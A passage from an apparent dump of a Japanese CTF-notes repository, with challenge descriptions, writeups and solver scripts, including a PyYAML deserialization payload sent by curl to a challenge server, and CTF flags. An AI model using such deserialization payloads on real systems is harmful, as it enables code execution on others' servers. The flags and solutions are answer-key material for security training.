Whales can only understand names up to 10 chars\", 400)\n```\n\nによって弾かれてしまう。\n\n![](img/2020-10-31-17-32-11.png)\n\nFlaskに対するSSTIを試してみたが、Formで与えた値がstr型になっているので上手くいかなった。\n\n* [CTF的 Flaskに対する攻撃まとめ](https://qiita.com/koki-sato/items/6ff94197cf96d50b5d8f)\n\n入力された文字列が表示されるので`<script>`タグを埋め込んでXSSすることもできたりする。\n\n![](img/2020-11-02-01-06-58.png)\n\n# Solution\n\n[writeup]\n\n* https://cryptax.github.io/2020/11/01/whales.html\n\n`config`パラメータをつけてPOSTリクエストを送ると`from_configuration()`が実行されることが分かる。\n\n```py\n@staticmethod\ndef from_configuration(config):\n return Wheel(**yaml.load(config, Loader=yaml.Loader))\n```\n\n```py\nif \"config\" in request.form:\n wheel = Wheel.from_configuration(request.form[\"config\"])\n return make_response(render_template(\"wheel.html.jinja\", w=wheel, active=\"wheel\"), 200)\n```\n\nここで、`yaml.load()`に任意のデータを与えることによって攻撃する。\n\n>**Warning**: It is not safe to call yaml.load with any data received from an untrusted source! yaml.load is as powerful as pickle.load and so may call any Python function. Check the yaml.safe_load function though.\n>> https://pyyaml.org/wiki/PyYAMLDocumentation\n\n`yaml.load()`にはpythonオブジェクトを埋め込むことができるので、`flag.get_flag()`関数を`apply()`で呼び出すようにする。\n\n`!!python/object/apply:flag.get_flag`\n\nよって、以下を実行すると`name`にフラグが表示される。\n\n```bash\ncurl -X POST http://chal.cybersecurityrumble.de:7780/wheel -d 'config={name: !!python/object/apply:flag.get_flag [], image_num: 2, diameter: 5}'\n```\n\n<!-- CSR{TH3_QU3STION_I5_WHY_WHY_CAN_IT_DO_THAT?!?} -->\n\n## コメント\n\nこういった背景もあってか、公式では`yaml.load()`ではなく`yaml.safe_load()`が推奨されていることを学んだ。\n\n`config`パラメータをPOSTしたときのための処理があるのは気づいていたが、設定ファイルを読み込むためのものだと思ってスルーしてしまったのが甘かった。\n\n\n\n\n" }, { "alpha_fraction": 0.6140350699424744, "alphanum_fraction": 0.7789473533630371, "avg_line_length": 30.66666603088379, "blob_id": "c1d46398cc457cb901b1d3617c80755f0b464f9e", "content_id": "7b1b937a30dbe98d4c06b6129ba4ed6d6e76e5d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 285, "license_type": "no_license", "max_line_length": 117, "num_lines": 9, "path": "/2021/redpwnCTF_2021/pastebin-1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Ah, the classic pastebin. 
Can you get the admin's cookies?\n\n[pastebin-1.mc.ax](https://pastebin-1.mc.ax/)\n\n[Admin bot](https://admin-bot.mc.ax/pastebin-1)\n\nDownloads\n\n[main.rs](https://static.redpwn.net/uploads/4313574d2348012d122d849530c4f18340644d88ea04f0cbb4932bd35efde1da/main.rs)\n" }, { "alpha_fraction": 0.6632652878761292, "alphanum_fraction": 0.8163265585899353, "avg_line_length": 27.14285659790039, "blob_id": "a4d02a09c889c0ba5537aad273e2115051602637", "content_id": "bd8ecf74324a72b963e5470abff2c8defddb4c69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 206, "license_type": "no_license", "max_line_length": 109, "num_lines": 7, "path": "/2021/SECCON_Beginners_CTF_2021/simple_RSA/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Let's encrypt it with RSA!\n\n[simple_RSA.tar.gz](https://beginners-dist-production.s3.isk01.sakurastorage.jp/simple_RSA/simple_RSA.tar.gz)\n\n0bf8879ad05cc4b49a643f4ef3c8672468862d56\n\n想定難易度: Beginner" }, { "alpha_fraction": 0.7153846025466919, "alphanum_fraction": 0.7923076748847961, "avg_line_length": 22.727272033691406, "blob_id": "5b36566f5166873c1107b111a2b5853aec245373", "content_id": "8f53c2724e695c9bbe26499f271ca1adb4ce2536", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 292, "license_type": "no_license", "max_line_length": 113, "num_lines": 11, "path": "/2021/WaniCTF21-spring/Automaton_Lab/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Automaton Lab.で将来予測のお手伝いをしましょう\n\n```\nnc automaton.mis.wanictf.org 50020\n```\n\nreference: https://en.wikipedia.org/wiki/Rule_30\n\n[mis-automaton-lab.zip](https://score.wanictf.org/storage/6b8kw4a85lsyqb7h4q5tb7v2inlr410s/mis-automaton-lab.zip)\n\nWriter : Badlylucky" }, { "alpha_fraction": 0.5894941687583923, "alphanum_fraction": 0.725680947303772, "avg_line_length": 16.133333206176758, "blob_id": "cee6198d748ccbc4271c6ced8740a371effd957b", "content_id": "b89762c4bc4ce90c7cf11c1a96e078cc525aa22d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 666, "license_type": "no_license", "max_line_length": 84, "num_lines": 30, "path": "/2021/BCACTF_2.0/Digitally_Encrypted_1/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\ndigファイルと以下のテキストが与えられる。\n\n```\nB6A46EE913B33E19 BCA67BD510B43632 A4B56AFE13AC1A1E BDAA7FE602E4775E EDF63AB850E67010\n```\n\ndigファイルに対して、Hint 1にあるソフトを使うと回路図が表示される。\n\n![](img/2021-06-13-00-44-04.png)\n\nどうやら、CipherはPlainとKeyとのXORらしい。\n\nつまり、CipherとKeyのXORを取ればPlainが分かる。\n\n```py\nfrom pwn import *\n\ncipher = open('encrypted.txt','r').read().split(' ')\nkey = 'd4c70f8a67d5456d'\nplain = b''\n\nfor c in cipher:\n plain += xor(bytes.fromhex(c),bytes.fromhex(key))\n\nprint(plain)\n```\n\n<!-- bcactf{that_was_pretty_simple1239152735} -->\n" }, { "alpha_fraction": 0.6592244505882263, "alphanum_fraction": 0.6850763559341431, "avg_line_length": 21.36842155456543, "blob_id": "82d3587a94900dff8dc39e9c9b5270bb77a558d2", "content_id": "831f7e93c93608359439855d0474cd445e6c6429", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1267, "license_type": "no_license", "max_line_length": 65, "num_lines": 38, "path": "/2020/pbctf_2020/Ainissesthai/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# 
Writeup\n\n**Enigma**で暗号化された文字列が出力されるので、これらをヒントに復号化すればよい。\n\nEnigmaの初期設定に使われる値がすべてランダムなので、まともに総当たりしても解けない。\n\nrotors: 8\\*8\\*8 通り \nreflector: 4 通り \nring_settings: 26\\*26\\*26 通り \nplugboard: ? 通り \ninitial_value: 26\\*26\\*26 通り \n\nEnigma暗号には、平文と暗号文で同じ位置に同じアルファベットが登場しないという特徴がある。\n\n* https://ja.wikipedia.org/wiki/エニグマ_(暗号機)#ある種の不完全性_(noncrashing)\n\nよって暗号文をたくさん生成し、各位置において登場しないアルファベットを絞り込んでいけばよい。\n\n```py\nfrom string import ascii_uppercase as UC\n\ncipherlist = []\nwith open('./output.txt') as f:\n while True:\n cipher = f.readline()\n if len(cipher) < 1:\n break\n cipherlist.append(cipher[0:-1]) # exclude \\n\n\nfor i in range(17):\n string = [char[i] for char in cipherlist]\n diff = set(UC)-set(string)\n print(list(diff)[0],end='')\n```\n\nフラグの文字列が出力される。形式は`pbctf{UPPERCASEPLAINTEXT}`である。\n\n<!-- pbctf{FATALFLAWINENIGMA} -->\n\n" }, { "alpha_fraction": 0.5945945978164673, "alphanum_fraction": 0.6602316498756409, "avg_line_length": 31.5, "blob_id": "d997425241b3e2b80cd78b295e11ec49101cb6bf", "content_id": "c87ab4e8faa9f00f03f4894f809fcbe00cf22c38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 259, "license_type": "no_license", "max_line_length": 63, "num_lines": 8, "path": "/2021/HeroCTF_v3/h4XOR/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import os\nfrom pwn import xor\n\npng_fixed9bytes = b'\\x89\\x50\\x4E\\x47\\x0D\\x0A\\x1A\\x0A\\x00'\ne = open(os.path.dirname(__file__)+\"/flag.png.enc\",\"rb\").read()\nkey = xor(e[0:9],png_fixed9bytes)\nf = open(os.path.dirname(__file__)+\"/flag.png\",\"wb\")\nf.write(xor(e,key))" }, { "alpha_fraction": 0.5429447889328003, "alphanum_fraction": 0.5705521702766418, "avg_line_length": 19.39583396911621, "blob_id": "ae866915f31e2050c1a226ac2f36dd3207563baa", "content_id": "261135138b1504d17d4c6df820e949cce9629cd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1120, "license_type": "no_license", "max_line_length": 59, "num_lines": 48, "path": "/2020/WaniCTF/logged_flag/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nキーボードの入力が記録されているようなので見やすくする。\n\n```py\nimport re\n\ncmd = ''\n\nwith open('./key_log.txt') as f:\n for _ in range(317):\n line = f.readline()\n key = re.findall(r'(?<=\\[).+?(?=\\])',line)\n if len(key) == 0:\n continue\n if key[0] == 'Enter':\n cmd += '\\n'\n elif key[0] == 'Shift':\n continue\n elif key[0] == 'Space':\n cmd += ' '\n elif key[0] == 'BackSpace':\n cmd = cmd[:-1]\n else:\n cmd += key[0].lower()\n \n print(cmd)\n```\n\n```bash\n$ python3 solver.py \nmkdir steghide\ncp original.jpg ./steghide\ncd steghide\necho flag[k3y-l0gg3r-1s-v3ry-d4ng3r0us] . 
flag.txt\nsteghide embed -cf original.jpg -ef flag.txt -sf secret.jpg\nmachikanetamachikanesai\nmachikanetamachikanesai\nsteghide extract -sf secret.jpg\nmachikanetamachikanesai\nycat flag.txt\n```\n\n`Shift`の部分を適用して`FLAG{}`の形式にする。\n\n英字配列のキーボードなので、`-`のシフト入力は`_`に読み替える。\n\n<!-- FLAG{k3y_l0gg3r_1s_v3ry_d4ng3r0us} -->" }, { "alpha_fraction": 0.708695650100708, "alphanum_fraction": 0.7347826361656189, "avg_line_length": 20, "blob_id": "9f3d6b13a620941795c8501ecd8bd1a9c82c8294", "content_id": "71015a53734b5d41299b2055a691dca992fe525c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 230, "license_type": "no_license", "max_line_length": 94, "num_lines": 11, "path": "/2021/ImaginaryCTF_2021/Hidden/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "**Description**\n\nOh no, someone hid my flag behind a giant red block! Please help me retrieve it!!\n\n**Attachments**\n\n[https://imaginaryctf.org/r/10C4-challenge.psd](https://imaginaryctf.org/r/10C4-challenge.psd)\n\n**Author**\n\nAstro" }, { "alpha_fraction": 0.5793209671974182, "alphanum_fraction": 0.595678985118866, "avg_line_length": 21.047618865966797, "blob_id": "6c304cc414078c6b5f6d96efaced1ca0bf90cdbb", "content_id": "c0c1b40333c231644527e6b2bec47e5cb93cc958", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3240, "license_type": "no_license", "max_line_length": 86, "num_lines": 147, "path": "/environment/setup.sh", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "##############################\n# For Ubuntu 20.04 #\n# Usage : sudo sh setup.sh #\n##############################\n\nsudo apt-get update -y\n\n##############################\n# Misc #\n##############################\n\n# Git\napt install git\n\n# curl\nsudo apt install curl\n\n# Python2\napt install python2\n\n# pip\ncurl https://bootstrap.pypa.io/get-pip.py -o get-pip.py\npython2 get-pip.py\n\n# Ruby\nsudo apt-get install libreadline-dev\nsudo apt install build-essential libssl-dev zlib1g-dev\ngit clone https://github.com/rbenv/rbenv.git ~/.rbenv\ngit clone https://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build\n<< BASHRC # append to .bashrc\nexport PATH=$PATH:$HOME/.rbenv/bin \nBASHRC\nrbenv install 2.7.1\n\n# docker\nsudo apt install docker-compose\n\n##############################\n# Pwn #\n##############################\n\n# pwntools\npython3 -m pip install pwntools\n\n##############################\n# Reversing #\n##############################\n\n# angr (with virtualenv)\napt-get install python3-dev libffi-dev build-essential virtualenvwrapper\n<< BASHRC # append to .bashrc\n### Virtualenvwrapper\nif [ -f /usr/share/virtualenvwrapper/virtualenvwrapper.sh ]; then\n export WORKON_HOME=$HOME/.virtualenvs\n source /usr/share/virtualenvwrapper/virtualenvwrapper.sh\nfi\nBASHRC\n# :after restart\nmkvirtualenv --python=$(which python3) angr\npip install angr\n\n# UPX\nsudo apt-get install -y upx\n\n# gdb-peda\ngit clone https://github.com/longld/peda.git ~/peda\necho \"source ~/peda/peda.py\" >> ~/.gdbinit\n\n# for 32bit ELF\napt-get install lib32z1\n\n# Ghidra (include install dependencies)\nwget https://download.java.net/java/GA/jdk11/9/GPL/openjdk-11.0.2_linux-x64_bin.tar.gz\ntar xvf openjdk-11.0.2_linux-x64_bin.tar.gz\nsudo mkdir /opt/java/\nsudo mv jdk-11.0.2 /opt/java/\necho 'JAVA_HOME=/opt/java/jdk-11.0.2' >> ~/.bashrc\necho 'PATH=$JAVA_HOME/bin:$PATH' >> ~/.bashrc\n\n# uncompyle6 
(.pyc to .py)\npip install uncompyle6\n\n##############################\n# Crypto #\n##############################\n\n# Crypto\npip3 install pycrypto\npip install pycryptodome\n\n##############################\n# Math #\n##############################\n\n# SageMath\napt-get install sagemath\n\n##############################\n# Forensic #\n##############################\n\n# Volatility (include install dependencies)\nsudo apt install pcregrep libpcre++-dev\nsudo apt install gcc python2.7-dev\npip install pycrypto\npip install distorm3==3.4.4\ngit clone https://github.com/volatilityfoundation/volatility.git\ncd volatility/\nsudo python2 setup.py build install\n\n# Wireshark\nsudo apt install wireshark\n\n# binwalk\nsudo apt install binwalk\n\n# Zsteg(Ruby)\nsudo gem install zsteg\n\n# fcrackzip\nsudo apt-get install fcrackzip\n\n# john the ripper\ngit clone https://github.com/openwall/john.git\ncd john/src\n./configure && make\nsudo ln -s $(pwd)/../run/zip2john /usr/local/bin\n\n# mupdf, mutool\nsudo apt install mupdf-tools\n\n# QSSTV\nsudo apt-get install qsstv\nsudo apt install pavucontrol\n\n# ffmpeg\nsudo apt install ffmpeg\n\n##############################\n# Web #\n##############################\n\n# nmap\nsudo apt install nmap\n\n# lynx\nsudo apt install lynx" }, { "alpha_fraction": 0.6944444179534912, "alphanum_fraction": 0.71875, "avg_line_length": 18.266666412353516, "blob_id": "865d2c9cda8cdc24e3c98f6ba1230c69110f58e8", "content_id": "521b08d8b2373250a585ac1b4ecfe5b111d487d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 288, "license_type": "no_license", "max_line_length": 84, "num_lines": 15, "path": "/2021/BCACTF_2.0/Wait_this_isnt_C/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "This just looks like a binary...\n\nLets try to decompile it...\n\nWait, this isn't C...\n\n[flag_checker_1](https://objects.bcactf.com/bcactf2/wait_this_isnt_c/flag_checker_1)\n\nHint 1 of 2\n\nWhat is the original language, maybe look into that language?\n\nHint 2 of 2\n\nWhat do arrays start at? ;)" }, { "alpha_fraction": 0.7379679083824158, "alphanum_fraction": 0.7834224700927734, "avg_line_length": 61.5, "blob_id": "018237b2a67546bf0a2081f912dce2d5c61d70a7", "content_id": "5de8334eb3ac8440259c27afa326f4647d239947", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 374, "license_type": "no_license", "max_line_length": 95, "num_lines": 6, "path": "/2020/SquareCTF2020/Hash_My_Awesome_Commands/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I found this strange server that only has two commands. Looks like there's a command to get the\nflag, but I can't figure out how to get it to work. It did come with a strange note that had\n**9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=** written on it. 
Maybe that's important?\nnc challenges.2020.squarectf.com 9020\n\n[hmac.go](https://2020.squarectf.com/static/files/hmac.go)" }, { "alpha_fraction": 0.6088560819625854, "alphanum_fraction": 0.7749077677726746, "avg_line_length": 33, "blob_id": "082ca44b08993cecb34c622a06e04f056ec08f94", "content_id": "2dfd5a334ef20906dc686eedf047f48fe61d5bfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 271, "license_type": "no_license", "max_line_length": 102, "num_lines": 8, "path": "/2021/HeroCTF_v3/h4XOR/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Can you recover the flag.png image ?\n\nFormat : Hero{flag}\nAuthor : xanhacks\n\n[flag.png.enc](https://www.heroctf.fr/files/237772c88be084c125323d701220b77d/flag.png.enc?token=eyJ1c2VyX2lkIjoxMzgyLCJ0ZWFtX2lkIjo3NDYsImZpbGVfaWQiOjE4fQ.YIOVAw.D0oLFcGSSa8zG-8gQalS_NsFQcc)\n\n[xor.py](https://www.heroctf.fr/files/d314a837ffa10d95ffb6c67446d4360f/xor.py?token=eyJ1c2VyX2lkIjoxMzgyLCJ0ZWFtX2lkIjo3NDYsImZpbGVfaWQiOjE5fQ.YIOVAw.R2qmFfRyRAOZGlcUQg2S28eEmLo)" }, { "alpha_fraction": 0.3033088147640228, "alphanum_fraction": 0.3841911852359772, "avg_line_length": 19.961538314819336, "blob_id": "530e4f5127e14bb92daba8af9786ff9f6ad3fa61", "content_id": "c4144b12d745d2e93a8268cd79104f898949ba1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 546, "license_type": "no_license", "max_line_length": 80, "num_lines": 26, "path": "/2021/justCTF_2020/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# justCTF [*] 2020\n\n* https://2020.justctf.team/\n\n* 2021/01/30 15:00 JST — 2021/02/01 04:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ------------------------------------- | ------- | ----: | -----: |\n| Reversing | [That's not crypto](Thats_not_crypto) | pyc | 50 | |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ------- | ------------ | ------- | ----: | -----: |\n\n---\n\n## Result\n\n* 100 points\n\n* 357 / 804 (> 1 pt)" }, { "alpha_fraction": 0.598802387714386, "alphanum_fraction": 0.7005987763404846, "avg_line_length": 17.55555534362793, "blob_id": "262a3f6b5b0a83e905ac476bf9ad27db3f0baef3", "content_id": "6c9ed495275a3362bc85c7af4f07b9195b586c51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 237, "license_type": "no_license", "max_line_length": 41, "num_lines": 9, "path": "/2021/UIUCTF_2021/wasmbaby/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://wasmbaby.chal.uiuc.tf にアクセスする。\n\n開発者ツールで`index.wasm`を見ると、フラグがそのまま書かれていた。\n\n![](img/2021-07-31-23-38-09.png)\n\n<!-- uiuctf{welcome_to_wasm_e3c3bdd1} -->\n" }, { "alpha_fraction": 0.706818163394928, "alphanum_fraction": 0.7363636493682861, "avg_line_length": 22.210525512695312, "blob_id": "ecbf1b3358defb651a85a892e454a5fb8f2771a7", "content_id": "0d083b729b7382130298d1409ac7f22c8909bfa9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 440, "license_type": "no_license", "max_line_length": 86, "num_lines": 19, "path": "/2021/BCACTF_2.0/Welcome_to_the_Casino/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Can you get three-of-a-kind on this slot machine? 
Let's find out!\n\n`nc misc.bcactf.com 49156`\n\nHint 1 of 4\n\nThere's got to be a faster way than to connect manually, right?\n\nHint 2 of 4\n\nCan you use a tool to make your computer connect for you?\n\nHint 3 of 4\n\nThe flag is in the format bcactf{...}. Use that to your advantage when parsing output.\n\nHint 4 of 4\n\nOnce you're connecting as fast as you can, how can you get even more connections?" }, { "alpha_fraction": 0.714893639087677, "alphanum_fraction": 0.757446825504303, "avg_line_length": 20.454545974731445, "blob_id": "64defc43f219860659ed30fde6e1c964c92fdc04", "content_id": "d9bc06744d5525d0384bbdcb1b1ab0cb1373d068", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 237, "license_type": "no_license", "max_line_length": 116, "num_lines": 11, "path": "/2021/ImaginaryCTF_2021/Chicken_Caesar_Salad/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "**Description**\n\nI remember the good old days when Caesar ciphers were easy…\n\n**Attachments**\n\n[https://imaginaryctf.org/r/5363-chicken-caesar-salad.txt](https://imaginaryctf.org/r/5363-chicken-caesar-salad.txt)\n\n**Author**\n\nFIREPONY57" }, { "alpha_fraction": 0.6740196347236633, "alphanum_fraction": 0.7230392098426819, "avg_line_length": 33, "blob_id": "83cd6c1552aba80a0fd1b2490c65a6423c8ad001", "content_id": "d451f3cbba35bb799b2154fe9639cba200714ec9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 408, "license_type": "no_license", "max_line_length": 64, "num_lines": 12, "path": "/2021/DiceCTF_2021/babymix/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "\nimport angr\n\np = angr.Project('babymix')\nmain_addr = p.loader.main_object.get_symbol('main').rebased_addr\nprint('main_addr = ',main_addr)\nstate = p.factory.entry_state()\nsim = p.factory.simulation_manager(state)\naddr_success = main_addr + (0x222C-0x21C5)\naddr_failed = main_addr + (0x2238-0x21C5)\nsim.explore(find=addr_success,avoid=addr_failed)\nif len(sim.found) > 0:\n print(sim.found[0].posix.dumps(0))" }, { "alpha_fraction": 0.6436170339584351, "alphanum_fraction": 0.813829779624939, "avg_line_length": 61.66666793823242, "blob_id": "ec2873f8932b3d8d7db0971b2ed9c7fe53d1204a", "content_id": "83f3e048217e9d2cb8ec8a3acf5c017d45fcc17a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 188, "license_type": "no_license", "max_line_length": 110, "num_lines": 3, "path": "/2021/RaRCTF_2021/Dotty/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "My new program will keep your secrets safe using military grade encryption!\n\n[Dotty.exe - 81a733](https://files-ctf.rars.win/challenge-files/16/81a73332991e141a45c77a115a7c0415/Dotty.exe)\n" }, { "alpha_fraction": 0.7572254538536072, "alphanum_fraction": 0.7745664715766907, "avg_line_length": 57, "blob_id": "0140050775e08da170381e2d291cb976c826c02d", "content_id": "b4b232081470e22a4e27fc2f3522cd98c65b8eba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 173, "license_type": "no_license", "max_line_length": 95, "num_lines": 3, "path": "/2020/KipodAfterFreeCTF/8byte/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "My friend has sent me this packed binary. 
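The slot-machine task above all but asks for automation. A hedged reconnect-and-grep sketch with pwntools; the service's exact I/O protocol is unknown here, so the read strategy and the flag regex are assumptions based on the hints.

```python
# Reconnect until a flag-shaped string appears in the transcript (assumed format).
import re
from pwn import remote

while True:
    io = remote('misc.bcactf.com', 49156)
    transcript = io.recvrepeat(2).decode(errors='replace')
    io.close()
    match = re.search(r'bcactf\{[^}]+\}', transcript)
    if match:
        print(match.group(0))
        break
```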
Can you understand what it does and extract the flag?\n\n[binary.exe](https://kaf-public.s3-eu-west-1.amazonaws.com/8byte/binary.exe)" }, { "alpha_fraction": 0.5320000052452087, "alphanum_fraction": 0.5580000281333923, "avg_line_length": 18.230770111083984, "blob_id": "94beaadd55cd3c0aa028adf6fb3c47bbb464dbca", "content_id": "1ba66d09986cdf7cb0b984905860e184254b4dd6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 500, "license_type": "no_license", "max_line_length": 43, "num_lines": 26, "path": "/2021/SECCON_Beginners_CTF_2021/p-8RSA/problem.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Util.number import *\nfrom random import getrandbits\nfrom os import urandom\nfrom flag import flag\n\n\ndef gen_primes(bits, e):\n q = getStrongPrime(bits)\n p = q\n while True:\n p = p-8 # p-8\n phi = (p - 1) * (q - 1)\n if isPrime(p) and GCD(phi, e) != 1:\n break\n return p, q\n\nflag = flag.encode(\"utf-8\") + urandom(64)\nflag = bytes_to_long(flag)\n\ne = 17\np, q = gen_primes(512, e)\nn = p * q\n\nprint(\"n =\", n)\nprint(\"e =\", e)\nprint(\"c =\", pow(flag, e, n))\n" }, { "alpha_fraction": 0.5386710166931152, "alphanum_fraction": 0.5876906514167786, "avg_line_length": 19.64044952392578, "blob_id": "5ebab58e0a4e7356d6487eaf065e32e3d4c7a75d", "content_id": "eec4271ba271b36c388f9b2c71b4a8f5dcbb0a54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2052, "license_type": "no_license", "max_line_length": 68, "num_lines": 89, "path": "/2021/UIUCTF_2021/dhke_intro/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムが与えられる。\n\n\n```py\nimport random\nfrom Crypto.Cipher import AES\n\n# generate key\ngpList = [ [13, 19], [7, 17], [3, 31], [13, 19], [17, 23], [2, 29] ]\ng, p = random.choice(gpList)\na = random.randint(1, p)\nb = random.randint(1, p)\nk = pow(g, a * b, p)\nk = str(k)\n\n# print(\"Diffie-Hellman key exchange outputs\")\n# print(\"Public key: \", g, p)\n# print(\"Jotaro sends: \", aNum)\n# print(\"Dio sends: \", bNum)\n# print()\n\n# pad key to 16 bytes (128bit)\nkey = \"\"\ni = 0\npadding = \"uiuctf2021uiuctf2021\"\nwhile (16 - len(key) != len(k)):\n key = key + padding[i]\n i += 1\nkey = key + k\nkey = bytes(key, encoding='ascii')\n\nwith open('flag.txt', 'rb') as f:\n flag = f.read()\n\niv = bytes(\"kono DIO daaaaaa\", encoding = 'ascii')\ncipher = AES.new(key, AES.MODE_CFB, iv)\nciphertext = cipher.encrypt(flag)\n\nprint(ciphertext.hex())\n```\n\n`iv`は固定で、`key`がランダムである。\n\nしかし、`key`の生成に使われている`k`の値を見てみると、\n\n```py\ngpList = [ [13, 19], [7, 17], [3, 31], [13, 19], [17, 23], [2, 29] ]\ng, p = random.choice(gpList)\na = random.randint(1, p)\nb = random.randint(1, p)\nk = pow(g, a * b, p)\nk = str(k)\n```\n\n`mod p`の値が使われているので、`0~30`の値をとることが分かる。\n\n31パターンなら総当たりで良いので、以下を実行してフラグが得られた。\n\n```py\nfrom Crypto.Cipher import AES\n\nfor k in range(31):\n k = str(k)\n\n # pad key to 16 bytes (128bit)\n key = \"\"\n i = 0\n padding = \"uiuctf2021uiuctf2021\"\n while (16 - len(key) != len(k)):\n key = key + padding[i]\n i += 1\n key = key + k\n key = bytes(key, encoding='ascii')\n\n with open('output.txt', 'rb') as f:\n out = bytes.fromhex(f.read().decode())\n\n iv = bytes(\"kono DIO daaaaaa\", encoding = 'ascii')\n cipher = AES.new(key, AES.MODE_CFB, iv)\n ciphertext = cipher.decrypt(out)\n\n if b'uiuctf' in ciphertext:\n print(f'{key = }')\n print(f'{ciphertext = }')\n```\n\n<!-- 
uiuctf{omae_ha_mou_shindeiru_b9e5f9} -->" }, { "alpha_fraction": 0.37995824217796326, "alphanum_fraction": 0.8580375909805298, "avg_line_length": 42.54545593261719, "blob_id": "a7686da4668b93f7369216651e7786963e3a51ff", "content_id": "1333a14577bcdb3c600d6b2129e9dbd309c6bb84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 479, "license_type": "no_license", "max_line_length": 223, "num_lines": 11, "path": "/2021/BCACTF_2.0/Sailing_Thru_Decryption/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Util.number import *\nfrom pwn import *\n\nc = b'011001110110101001110011011011010111011101110011011110110011000101111000010111110110111100110001011010110101111101111000001101000111000001110010010111110110110000110011011110010011010001101010011011100011111101111101'\nkey = b'FHSKDN'\n\nprint(long_to_bytes(int(c,2)))\n\n# Vigenere Decode with key FHSKDN\n# \n# https://gchq.github.io/CyberChef/#recipe=Vigen%C3%A8re_Decode('FHSKDN')&input=Z2pzbXdzezF4X28xa194NHByX2wzeTRqbj99\n" }, { "alpha_fraction": 0.7797902822494507, "alphanum_fraction": 0.7826501727104187, "avg_line_length": 115.66666412353516, "blob_id": "32b584e7be8b5b119ae510c7ceb0bca5a17ab92b", "content_id": "73ebb8a650ee91fef806954c0eae264b181442ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1067, "license_type": "no_license", "max_line_length": 757, "num_lines": 9, "path": "/2021/RITSEC_CTF_2021/Inception_CTF_Dream_1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "The purpose of this CTF challenge is to identify common methods of hiding malicious files and code. In most cases adversaries will attempt to evade defenses in many cases by masquerading, hiding files, and more. There are five directories like the five levels in the movie Inception, Reality -> Van Chase -> The Hotel -> Snow Fortress -> Limbo. You will find one flag in each of the levels, that flag will also be the password to extract the next directory. 
